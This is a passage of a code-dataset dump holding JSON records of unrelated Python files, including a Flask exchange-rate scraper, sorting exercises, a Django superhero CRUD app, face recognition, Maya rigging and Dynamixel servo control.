Vector(['0','0'])\nprint ('is parallel:', v.is_parallel_to(w))\nprint ('is orthogonal:', v.is_orthogonal_to(w))\n","sub_path":"L0_Programming_Linear_Algebra_and_Differential_Equations/Linear Algebra/1.5_add_parallel_and_orthogonal.py","file_name":"1.5_add_parallel_and_orthogonal.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"482438893","text":"from flask import Flask, render_template\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom io import BytesIO\nimport base64\nfrom bs4 import BeautifulSoup \nimport requests\n\n#don't change this\nmatplotlib.use('Agg')\napp = Flask(__name__) #do not change this\n\n#insert the scrapping here\nurl_get = requests.get('https://www.exchange-rates.org/history/IDR/USD/T')\nsoup = BeautifulSoup(url_get.content,\"html.parser\")\n\n#find your right key here\ntable = soup.find('div', attrs={'class':'table-responsive'})\nrow = table.find_all('tr', attrs={'td':''})\n\nrow_length = len(row)\n\ntemp = [] #initiating a list \n\nfor i in range(1, row_length):\n#insert the scrapping process here\n \n data = table.find_all('tr', attrs={'td':''})[i].text\n \n temp.append((data)) \n\ntemp = temp[::-1]\n\n#change into dataframe\ndf = pd.DataFrame(temp, columns = ['data'])\n \n#insert data wrangling here\ndf[['a','b','c','d','e','f']]= df.data.str.split(expand=True)\ndf1 = df.drop(['data','b','c','d','e'], axis = 1)\ndf1['exchange_rates'] = df1['a'].str[-12:]\ndf2 = df1.drop(['a'], axis=1)\ndf2['date'] = df2['f'].astype('datetime64')\ndf3 = df2.drop(['f'], axis = 1)\ndf3['exchange_rates_clean'] = df3['exchange_rates'].str.replace(',', '')\ndf4 = df3.drop(['exchange_rates'], axis=1)\ndf4['exchange_rates_clean'] = df4['exchange_rates_clean'].astype('float64').round()\ndf4 = df4.set_index(['date'])\ndf4['exchange_rates'] = df4['exchange_rates_clean']\ndf4 = df4.drop(['exchange_rates_clean'], axis=1)\n#end of data wranggling \n\n@app.route(\"/\")\ndef index(): \n\t\n\tcard_data = f'{df4[\"exchange_rates\"].mean().round(2)}' #be careful with the \" and ' \n\n\t# generate plot\n\tax = df4.plot(figsize = (20,9)) \n\t\n\t# Rendering plot\n\t# Do not change this\n\tfigfile = BytesIO()\n\tplt.savefig(figfile, format='png', transparent=True)\n\tfigfile.seek(0)\n\tfigdata_png = base64.b64encode(figfile.getvalue())\n\tplot_result = str(figdata_png)[2:-1]\n\n\t# render to html\n\treturn render_template('index.html',\n\t\tcard_data = card_data, \n\t\tplot_result=plot_result\n\t\t)\n\n\nif __name__ == \"__main__\": \n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"115640429","text":"# coding:utf-8\nfrom Base import *\n\n# 所有自定义函数写在class内部\n# 37ms small 1303B 7770744\n\n\nclass Answer(Base):\n def solve(self, items):\n return self.quickSort(items)\n\n def median(self, a, start, end):\n center = int((start + end) / 2)\n if self.compare(a[center].id, a[start].id):\n a[start], a[center] = a[center], a[start]\n if self.compare(a[end].id, a[start].id):\n a[start], a[end] = a[end], a[start]\n if self.compare(a[end].id, a[center].id):\n a[center], a[end] = a[end], a[center]\n a[start], a[center] = a[center], a[start]\n\n def doSwap(self, a, start, end):\n if start >= end:\n return\n i, j = start, end\n self.median(a, start, end)\n tmp = a[start]\n while(True):\n while(self.compare(tmp.id, a[j].id) and i < j):\n j -= 1\n if i < j:\n a[i] = a[j]\n i += 1\n while(self.compare(a[i].id, tmp.id) and i < j):\n i += 1\n if i < j:\n a[j] = a[i]\n j -= 1\n else:\n break\n a[i] = tmp\n self.doSwap(a, start, i - 1)\n self.doSwap(a, j + 1, end)\n\n def quickSort(self, a):\n self.doSwap(a, 0, len(a) - 1)\n return a\n\n\nif __name__ == '__main__':\n data = [3, 6, 7, 9, 1, 2, 4, 0, 8, 5, 16]\n testData = []\n result = []\n for i in data:\n newItem = Item(i, 1)\n testData.append(newItem)\n a = Answer()\n for i in range(0, len(data)):\n result.append(a.solve(testData)[i].id)\n print(result)\n","sub_path":"qlcode/contests_2/77quickSort.py","file_name":"77quickSort.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"187398633","text":"import sys\ninput = sys.stdin.readline\nn = int(input())\na = [0] + list(map(int,input().split()))\nd = [0]*(n+1)\n\nfor i in range(1,n+1):\n d[i] = d[i-1] + a[i]\nTotal = d[n]\nif Total % 3 != 0:\n print(0)\n exit(0)\n\ntarget_num = Total//3\ninner_cnt = 0\nans = 0\nif d[1] == target_num : inner_cnt = 1\nfor i in range(2,n):\n if d[i]==target_num*2: ans +=inner_cnt\n if d[i]==target_num: inner_cnt+=1\nprint(ans)","sub_path":"CodeForce/Number of Ways.py","file_name":"Number of Ways.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336802174","text":"import urllib.request\nimport os\nimport ssl\nimport json\n\ngcloud_api_key=os.environ[\"GCLOUD_KEY\"]\ncontext = ssl._create_unverified_context()\ngoogle_api_root=\"https://maps.googleapis.com/maps/api/\"\n\ndef get_distance_matrix(origin, destination, units=\"metric\", languages=\"en\"):\n params = [\n (\"units\",units),\n (\"origins\", origin),\n (\"destinations\", destination),\n (\"key\", gcloud_api_key),\n (\"language\", languages)\n ]\n url = google_api_root + \"distancematrix/json?\" + urllib.parse.urlencode(params)\n contents = urllib.request.urlopen(url, context=context).read()\n data = json.loads(contents.decode('utf-8'))\n return data\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"295839873","text":"from CartPole import CartPole\n\ndef test():\n cartPole = CartPole(1., 2., 3., 4.)\n value = cartPole.dynamics(1., 2., 3., 4., 5.)\n print(value)\n\n state = cartPole.step()\n print(state)\n\nif __name__ == '__main__':\n test()","sub_path":"CartPole/CartPoleTest.py","file_name":"CartPoleTest.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384079166","text":"import cv2\nimport numpy as np\n\nimage=cv2.imread('images/pyramid.jpg')\ngray=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n\nsift=cv2.xfeatures2d.SIFT_create()\nkeypoints=sift.detect(gray,None)\n\nprint('no of keypoints detected : '+str(len(keypoints)))\nimage=cv2.drawKeypoints(image,keypoints,None,flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\ncv2.imshow('feature method - SIFT',image)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n","sub_path":"files/28_SIFT.py","file_name":"28_SIFT.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475955277","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n################################################################################\n# Copyright 2017 ROBOTIS CO., LTD.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\nimport os\nfrom dynamixel_sdk import * # Uses Dynamixel SDK library\nprint (\"My os name is \" + os.name)\n# Control table address\nADDR_MX_TORQUE_ENABLE = 24 # Control table address is different in Dynamixel model\nADDR_MX_GOAL_POSITION = 30\nADDR_MX_PRESENT_POSITION = 36\nADDR_MX_MOVING_SPEED = 32\n\n# Protocol version\nPROTOCOL_VERSION = 1.0 # See which protocol version is used in the Dynamixel\n\n# Default setting\nServo_Neck1_ID = 10 # Neck Joint Up and Down \nServo_Neck2_ID = 20 # Head Joint Left Right \nServo_S1R_ID = 30 # Shoulder Joint 1 Right\nServo_S2R_ID = 31 # Shoulder Joint 2 Right\nServo_E1R_ID = 32 # Elbow Joint 1 Right\nServo_E2R_ID = 33 # Elbow Joint 2 Right\nServo_S1L_ID = 40 # Shoulder Joint 1 Left\nServo_S2L_ID = 41 # Shoulder Joint 2 Left\nServo_E1L_ID = 42 # Elbow Joint 1 Left\nServo_E2L_ID = 43 # Elbow Joint 2 Left\n\n \nServos_Head = [Servo_Neck1_ID, Servo_Neck2_ID]\nServos_Left_Arm = [Servo_S1L_ID, Servo_S2L_ID, Servo_E1L_ID, Servo_E2L_ID]\nServos_Right_Arm = [Servo_S1R_ID, Servo_S2R_ID, Servo_E1R_ID, Servo_E2R_ID]\nServos_All = [Servo_Neck1_ID, Servo_Neck2_ID, Servo_S1R_ID, Servo_S2R_ID, Servo_E1R_ID, Servo_E2R_ID,\nServo_S1L_ID, Servo_S2L_ID, Servo_E1L_ID, Servo_E2L_ID]\n\nBAUDRATE = 1000000 # Dynamixel default baudrate : 57600\n#DEVICENAME = 'COM4' \nMoving_Speed = 0\nDEVICENAME = '/dev/ttyUSB0' # Check which port is being used on your controller\n # ex) Windows: \"COM1\" Linux: \"/dev/ttyUSB0\" Mac: \"/dev/tty.usbserial-*\"\n\nTORQUE_ENABLE = 1 # Value for enabling the torque\nTORQUE_DISABLE = 0 # Value for disabling the torque\nDXL_MINIMUM_POSITION_VALUE = 0 # Dynamixel will rotate between this value\nDXL_MAXIMUM_POSITION_VALUE = 1020 # and this value (note that the Dynamixel would not move when the position value is out of movable range. Check e-manual about the range of the Dynamixel you use.)\nDXL_MOVING_STATUS_THRESHOLD = 20 # Dynamixel moving status threshold\n\nindex = 0\ndxl_goal_position = [DXL_MINIMUM_POSITION_VALUE, DXL_MAXIMUM_POSITION_VALUE] # Goal position\n\n\n# Initialize PortHandler instance\n# Set the port path\n# Get methods and members of PortHandlerLinux or PortHandlerWindows\nportHandler = PortHandler(DEVICENAME)\n\n# Initialize PacketHandler instance\n# Set the protocol version\n# Get methods and members of Protocol1PacketHandler or Protocol2PacketHandler\npacketHandler = PacketHandler(PROTOCOL_VERSION)\n\n# Open port\nif portHandler.openPort():\n print(\"Succeeded to open the port\")\nelse:\n print(\"Failed to open the port\")\n print(\"Press any key to terminate...\")\n #getch()\n quit()\n\n\n# Set port baudrate\nif portHandler.setBaudRate(BAUDRATE):\n print(\"Succeeded to change the baudrate\")\nelse:\n print(\"Failed to change the baudrate\")\n print(\"Press any key to terminate...\")\n #getch()\n quit()\n\n# # Enable Dynamixel Torque for Left Right Servo to test connection\n# dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, Servo_LeftRight_ID , ADDR_MX_TORQUE_ENABLE, TORQUE_ENABLE)\n# if dxl_comm_result != COMM_SUCCESS:\n# print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n# elif dxl_error != 0:\n# print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n# else:\n# print(\"Dynamixel has been successfully connected\")\n\n\ndef Enable_Torque(Servo_ID):\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, Servo_ID , ADDR_MX_TORQUE_ENABLE, TORQUE_ENABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Torque has been enabled for Servo %d\" %Servo_ID)\n\ndef Disable_Torque(Servo_ID):\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, Servo_ID, ADDR_MX_TORQUE_ENABLE, TORQUE_DISABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Torque has been enabled for Servo %d\" %Servo_ID) \n\n\ndef Set_Speed(Servo_ID, Speed):\n dxl_comm_result, dxl_error = packetHandler.write2ByteTxRx(portHandler, Servo_ID , ADDR_MX_MOVING_SPEED, Speed)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel Speed has been successfully changed\")\n\ndef Set_GoalPosition (Servo_ID, GoalPosition):\n dxl_comm_result, dxl_error = packetHandler.write2ByteTxRx(portHandler, Servo_ID, ADDR_MX_GOAL_POSITION, GoalPostion)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\ndef Get_Current_Pos(Servo_ID):\n dxl_present_position, dxl_comm_result, dxl_error = packetHandler.read2ByteTxRx(portHandler, Servo_ID, ADDR_MX_PRESENT_POSITION)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n return dxl_present_position \n \n\n# Read present Speed\ndef Get_Current_Speed(Servo_ID):\n dxl_present_speed, dxl_comm_result, dxl_error = packetHandler.read2ByteTxRx(portHandler, Servo_ID, ADDR_MX_MOVING_SPEED)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result)) \n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else: \n return dxl_present_speed\n\n \n \n# print(\"Press any key to continue! (or press ESC to quit!)\")\n# # if getch() == chr(0x1b):\n# break\n\n\n\ndef Close_Port():\n # Close port\n portHandler.closePort()\n","sub_path":"Python/Halloween19/backup/backup_main_control.py","file_name":"backup_main_control.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"569201889","text":"def invoice(in_file):\r\n try:\r\n assert not in_file == ''\r\n except AssertionError:\r\n print('Blank file name detected!')\r\n return False\r\n with open(in_file) as inf:\r\n values = inf.readline().split() # Read the first line to get N and k values\r\n n = int(values[0])\r\n k = int(values[1])\r\n all_invoices = list(range(n)) # Create a list of None of length N\r\n for line in inf: # Read each line, and set the element at invoice# -1 to None\r\n all_invoices[int(line)-1] = None\r\n\r\n missing = 0\r\n for i in all_invoices: # If an item is None, then the invoice# index of that item + 1 was found\r\n if i is not None:\r\n print(i+1)\r\n missing += 1\r\n if missing != k:\r\n print('There were less missing invoices found than specified!')\r\n\r\n\r\ninvoice('testdata.txt')\r\n","sub_path":"Week 4/missingInvoice/1A.py","file_name":"1A.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"491078990","text":"\"\"\"\n异常\n即便Python程序的语法是正确的,在运行它的时候,也有可能发生错误。运行期检测到的错误被称为异常。\n\n大多数的异常都不会被程序处理,都以错误信息的形式展现在这里:\n\n\"\"\"\n#10 * (1/0)\n\n\n\"\"\"\n异常处理\n\ntry语句按照如下方式工作;\n\n首先,执行try子句(在关键字try和关键字except之间的语句)\n如果没有异常发生,忽略except子句,try子句执行后结束。\n如果在执行try子句的过程中发生了异常,那么try子句余下的部分将被忽略。如果异常的类型和 except 之后的名称相符,那么对应的except子句将被执行。最后执行 try 语句之后的代码。\n如果一个异常没有与任何的except匹配,那么这个异常将会传递给上层的try中。\n一个 try 语句可能包含多个except子句,分别来处理不同的特定的异常。最多只有一个分支会被执行。\n\n处理程序将只针对对应的try子句中的异常进行处理,而不是其他的 try 的处理程序中的异常。\n\n一个except子句可以同时处理多个异常,这些异常将被放在一个括号里成为一个元组,例如:\n\nexcept (RuntimeError, TypeError, NameError):\n pass\n最后一个except子句可以忽略异常的名称,它将被当作通配符使用。你可以使用这种方法打印一个错误信息,然后再次把异常抛出。\n\"\"\"\nimport sys\n\ntry:\n f = open('myfile.txt')\n s = f.readline()\n i = int(s.strip())\nexcept OSError as err:\n print(\"OS error: {0}\".format(err))\nexcept ValueError:\n print(\"Could not convert data to an integer.\")\nexcept:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\n\n\n\"\"\"\ntry except 语句还有一个可选的else子句,如果使用这个子句,那么必须放在所有的except子句之后。这个子句将在try子句没有发生任何异常的时候执行。例如:\n\"\"\"\n\nfor arg in sys.argv[1:]:\n try:\n f = open(arg, 'r')\n except IOError:\n print('cannot open', arg)\n else:\n print(arg, 'has', len(f.readlines()), 'lines')\n f.close()\n\"\"\"\n使用 else 子句比把所有的语句都放在 try 子句里面要好,这样可以避免一些意想不到的、而except又没有捕获的异常。\n\n异常处理并不仅仅处理那些直接发生在try子句中的异常,而且还能处理子句中调用的函数(甚至间接调用的函数)里抛出的异常。例如:\n\"\"\"\ndef this_fails():\n x = 1/0\n\n\ntry:\n this_fails()\nexcept ZeroDivisionError as err:\n print('Handling run-time error:', err)\n\n\"\"\"\nHandling run-time error: int division or modulo by zero\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\n在 python3 中,处理带有参数的异常的方法如下:\n\"\"\"\n\n# 定义函数\ndef temp_convert(var):\n try:\n return int(var)\n except (ValueError) as Argument:\n print (\"参数没有包含数字\\n\", Argument)\n\n# 调用函数\ntemp_convert(\"xyz\")\n","sub_path":"com/onyx/basic/17错误和异常.py","file_name":"17错误和异常.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"329120813","text":"from django.http.response import HttpResponse\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom .models import Superhero\n\n# Create your views here.\n\n\ndef index(request):\n all_heroes = Superhero.objects.all()\n context = {\n 'all_heroes': all_heroes\n }\n return render(request, 'superhero/index.html', context)\n\ndef detail(request, hero_id):\n selected_hero = Superhero.objects.get(pk=hero_id)\n context = {\n \"selected_hero\": selected_hero\n }\n return render(request, 'superhero/detail.html', context)\n \n\ndef create(request):\n if request.method == \"POST\":\n name = request.POST.get('name')\n alter_ego_name = request.POST.get('alter_ego_name')\n primary_super_ability = request.POST.get('primary_super_ability')\n secondary_super_ability = request.POST.get('secondary_super_ability')\n catchphrase = request.POST.get('catchphrase')\n new_hero = Superhero(name=name, alter_ego_name=alter_ego_name, primary_super_ability=primary_super_ability, secondary_super_ability=secondary_super_ability, catchphrase=catchphrase)\n new_hero.save()\n return HttpResponseRedirect(reverse('superhero:index'))\n else:\n return render(request, 'superhero/create.html')\n\ndef edit(request, hero_id):\n selected_hero = Superhero.objects.get(pk=hero_id)\n if request.method == \"POST\":\n selected_hero.name = request.POST.get('name')\n selected_hero.alter_ego_name = request.POST.get('alter_ego_name')\n selected_hero.primary_super_ability = request.POST.get('primary_super_ability')\n selected_hero.secondary_super_ability = request.POST.get('secondary_super_ability')\n selected_hero.catchphrase = request.POST.get('catchphrase')\n selected_hero.save()\n context = {\n \"selected_hero\": selected_hero\n }\n return render(request, 'superhero/detail.html', context)\n else:\n context = {\n \"selected_hero\": selected_hero\n }\n return render(request, 'superhero/edit.html', context)\n\ndef delete(request, hero_id):\n selected_hero = Superhero.objects.get(pk=hero_id)\n if request.method == \"POST\":\n selected_hero.delete()\n return index(request)\n else:\n context = {\n \"selected_hero\": selected_hero\n }\n return render(request, 'superhero/delete.html', context)","sub_path":"superhero_creator/superhero/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"425453500","text":"import cv2\nimport face_recognition\nimport pickle\nimport time\n\nimage_file = './data/image/soccer_01.jpg'\nencoding_file = './data/encodings.pickle'\nunknown_name = 'Unknown'\nmodel_method = 'cnn'\n\n\ndef detectAndDisplay(frame):\n start_time = time.time()\n rgb = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n\n boxes = face_recognition.face_locations(rgb,model=model_method)\n encodings_1 = face_recognition.face_encodings(rgb,boxes)\n names = []\n for encoding in encodings_1:\n maches = face_recognition.compare_faces(data['encodings'],encoding)\n name = unknown_name\n if True in maches:\n machedindexs = [i for (i,b) in enumerate(maches) if b]\n counts = {}\n for i in machedindexs:\n name = data['names'][i]\n counts[name] = counts.get(name,0)+1\n name = max(counts,key=counts.get)\n names.append(name)\n for ((top,right,bottom,left),name) in zip(boxes,names):\n y= top -15 if top -15 >15 else top +15\n color = (0,255,0)\n line = 2\n if (name == unknown_name):\n color = (0,0,255)\n line = 1\n name = ''\n cv2.rectangle(frame,(left,top),(right,bottom),color,line)\n y = top - 15 if top - 15 > 15 else top + 15\n cv2.putText(frame,name,(left,y),cv2.FONT_HERSHEY_SIMPLEX,0.75,color,line)\n\n end_time = time.time()\n process_time = end_time - start_time\n print('process time',process_time)\n cv2.imshow('Recognition',frame)\n cv2.imwrite('./result/result_soccer_1.jpg',frame)\n\n\ndata = pickle.loads(open(encoding_file,'rb').read())\n\nimage = cv2.imread(image_file)\ndetectAndDisplay(image)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"video_face_recognize/image_find_son.py","file_name":"image_find_son.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442939734","text":"#####################################################\n# base ik rp solver limb\n# this limb should do the ik rpSolver rig functions\n#####################################################\n## import\nimport maya.cmds as cmds\n## import libs\nimport namingAPI.naming as naming\nimport common.transforms as transforms\nimport common.attributes as attributes\nimport common.apiUtils as apiUtils\nimport riggingAPI.joints as joints\nimport riggingAPI.controls as controls\nimport modelingAPI.curves as curves\nimport riggingAPI.constraints as constraints\n\nimport riggingAPI.rigComponents.baseLimbs.baseJointsLimb as baseJointsLimb\n## import rig utils\nimport riggingAPI.rigComponents.rigUtils.createDriveJoints as createDriveJoints\nimport riggingAPI.rigComponents.rigUtils.addTwistJoints as addTwistJoints\n\n## kwarg class\nclass kwargsGenerator(baseJointsLimb.kwargsGenerator):\n\t\"\"\"docstring for kwargsGenerator\"\"\"\n\tdef __init__(self):\n\t\tsuper(kwargsGenerator, self).__init__()\n\t\tself.dKwargs = {'lBpCtrls': None}\n\t\tself.addKwargs()\n\nclass baseIkRPsolverLimb(baseJointsLimb.baseJointsLimb):\n\t\"\"\"docstring for baseIkRPsolverLimb\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(baseIkRPsolverLimb, self).__init__(*args, **kwargs)\n\t\tif args:\n\t\t\tself._getComponentInfo(args[0])\n\t\telse:\n\t\t\tself._lBpCtrls = kwargs.get('lBpCtrls', None)\n\n\tdef createComponent(self):\n\t\tsuper(baseIkRPsolverLimb, self).createComponent()\n\n\n\t\tsParent_ctrl = self._sComponentControls\n\n\t\t## put ik joint chain locally\n\t\tsGrp_ikJnts = transforms.createTransformNode(naming.oName(sType = 'group', sSide = self._sSide, sPart = '%sRPJointsLocal' %self._sName, iIndex = self._iIndex).sName, lLockHideAttrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v'], sParent = self._sComponentRigNodesWorld)\n\t\tsParent_jntLocal = sGrp_ikJnts\n\t\tlJntsLocal = []\n\n\t\tlJntsLocal, lBindJnts = createDriveJoints.createDriveJoints(self._lBpJnts, sParent = sGrp_ikJnts, sSuffix = 'IkRPLocal', bBind = False)\n\t\tlJnts, lBindJnts = createDriveJoints.createDriveJoints(self._lBpJnts, sParent = self._sComponentJoints, sSuffix = 'IkRP', bBind = self._bBind)\n\n\t\tfor i, sJntLocal in enumerate(lJntsLocal):\n\t\t\tfor sAxis in ['X', 'Y', 'Z']:\n\t\t\t\tcmds.connectAttr('%s.translate%s' %(sJntLocal, sAxis), '%s.translate%s' %(lJnts[i], sAxis))\n\t\t\t\tcmds.connectAttr('%s.rotate%s' %(sJntLocal, sAxis), '%s.rotate%s' %(lJnts[i], sAxis))\n\t\t\t\tcmds.connectAttr('%s.scale%s' %(sJntLocal, sAxis), '%s.scale%s' %(lJnts[i], sAxis))\n\n\t\t## ctrls\n\t\tlCtrls = []\n\t\tfor i, sBpCtrl in enumerate(self._lBpCtrls):\n\t\t\toJntName = naming.oName(sBpCtrl)\n\t\t\tiRotateOrder = cmds.getAttr('%s.ro' %sBpCtrl)\n\t\t\tif i != 2:\n\t\t\t\tlLockHideAttrs = ['rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v']\n\t\t\telse:\n\t\t\t\tlLockHideAttrs = self._lLockHideAttrs\n\t\t\toCtrl = controls.create(oJntName.sPart, sSide = oJntName.sSide, iIndex = oJntName.iIndex, iStacks = self._iStacks, bSub = True, sParent = self._sComponentControls, sPos = sBpCtrl, iRotateOrder = iRotateOrder, sShape = 'cube', fSize = 8, lLockHideAttrs = lLockHideAttrs)\n\t\t\tlCtrls.append(oCtrl.sName)\n\n\t\t## ik handle\n\t\tsIkHnd = naming.oName(sType = 'ikHandle', sSide = self._sSide, sPart = '%sRPsolver' %self._sName, iIndex = self._iIndex).sName\n\t\tcmds.ikHandle(sj = lJntsLocal[0], ee = lJntsLocal[-1], sol = 'ikRPsolver', name = sIkHnd)\n\n\t\t#### offset group\n\t\tsGrpIk = transforms.createTransformNode(naming.oName(sType = 'group', sSide = self._sSide, sPart = '%sRPsolver' %self._sName, iIndex = self._iIndex).sName, lLockHideAttrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v'], sParent = self._sComponentRigNodesWorld, sPos = lCtrls[-1])\n\t\tsGrpPv = transforms.createTransformNode(naming.oName(sType = 'group', sSide = self._sSide, sPart = '%sPV' %self._sName, iIndex = self._iIndex).sName, lLockHideAttrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v'], sParent = self._sComponentRigNodesWorld, sPos = lCtrls[1])\n\t\tcmds.parent(sIkHnd, sGrpIk)\n\n\t\t#### pole vector constraint\n\t\tcmds.poleVectorConstraint(sGrpPv, sIkHnd)\n\t\t#### pole vector line\n\t\tsCrv, lClsHnds = curves.createCurveLine(naming.oName(sType = 'curve', sSide = self._sSide, sPart = '%sPvLineIk' %self._sName, iIndex = self._iIndex).sName, [lJnts[1], lCtrls[1]], bConstraint = False)\n\t\tcmds.parent(lClsHnds, sCrv, self._sComponentControls)\n\n\t\t## pass info to class\n\t\tself._lJnts = lJnts\n\t\tself._lCtrls = lCtrls\n\t\tself._lBindJnts = lBindJnts\n\t\tself._sGrpIk = sGrpIk\n\t\tself._sIkHnd = sIkHnd\n\t\tself._lJntsLocal = lJntsLocal\n\t\tif lBindJnts:\n\t\t\tself._lBindRootJnts = [lBindJnts[0]]\n\t\telse:\n\t\t\tself._lBindRootJnts = None\n\n\t\t## matrix connect\n\t\tconstraints.matrixConnect(lCtrls[0], [lJntsLocal[0]], 'matrixOutputWorld',lSkipRotate = ['X', 'Y', 'Z'], lSkipScale = ['X', 'Y', 'Z'], bForce = True)\n\t\tconstraints.matrixConnect(lCtrls[1], [sGrpPv, lClsHnds[1]], 'matrixOutputWorld',lSkipRotate = ['X', 'Y', 'Z'], lSkipScale = ['X', 'Y', 'Z'], bForce = True)\n\t\tconstraints.matrixConnect(lCtrls[2], [sGrpIk], 'matrixOutputWorld', lSkipScale = ['X', 'Y', 'Z'], bForce = True)\n\t\tsMultMatrixPv = cmds.createNode('multMatrix', name = naming.oName(sType = 'multMatrix', sSide = self._sSide, sPart = '%sPvMatrix' %self._sName, iIndex = self._iIndex).sName)\n\t\tcmds.connectAttr('%s.matrix' %lJnts[1], '%s.matrixIn[0]' %sMultMatrixPv)\n\t\tcmds.connectAttr('%s.matrix' %lJnts[0], '%s.matrixIn[1]' %sMultMatrixPv)\n\t\tconstraints.matrixConnect(sMultMatrixPv, [lClsHnds[0]], 'matrixSum', lSkipRotate = ['X', 'Y', 'Z'], lSkipScale = ['X', 'Y', 'Z'], bForce = True)\n\n\t\t## write component info\n\t\tself._writeGeneralComponentInfo('baseIkRPsolverLimb', lJnts, lCtrls, lBindJnts, self._lBindRootJnts)\n\n\t\t## output matrix\n\t\tif self._bInfo:\n\t\t\tself._writeOutputMatrixInfo(lJnts)\n\n\t\t## add twist joints\n\t\taddTwistJoints.twistJointsForLimb(self._iTwistJntNum, self._lSkipTwist, lJnts, self._lBpJnts, bBind = self._bBind, sNode = self._sComponentMaster, bInfo = self._bInfo)\n\n\t\tself._getComponentInfo(self._sComponentMaster)\n\n\tdef _getComponentInfo(self, sComponent):\n\t\tsuper(baseIkRPsolverLimb, self)._getComponentInfo(sComponent)\n\t\tself.rootCtrl = self._lCtrls[0]\n\t\tself.pvCtrl = self._lCtrls[1]\n\t\tself.ikCtrl = self._lCtrls[2]","sub_path":"maya/riggingAPI/rigComponents/baseLimbs/baseIkRPsolverLimb.py","file_name":"baseIkRPsolverLimb.py","file_ext":"py","file_size_in_byte":6111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"396586648","text":"#Jastejpal Soora\r\n\r\n#Node class\r\nclass Node:\r\n def __init__(self, leaf = False):\r\n self.keys = [None]*3 #array containing maximum of 3 keys\r\n self.children = [None]*4 #array containing maximum of 4 child 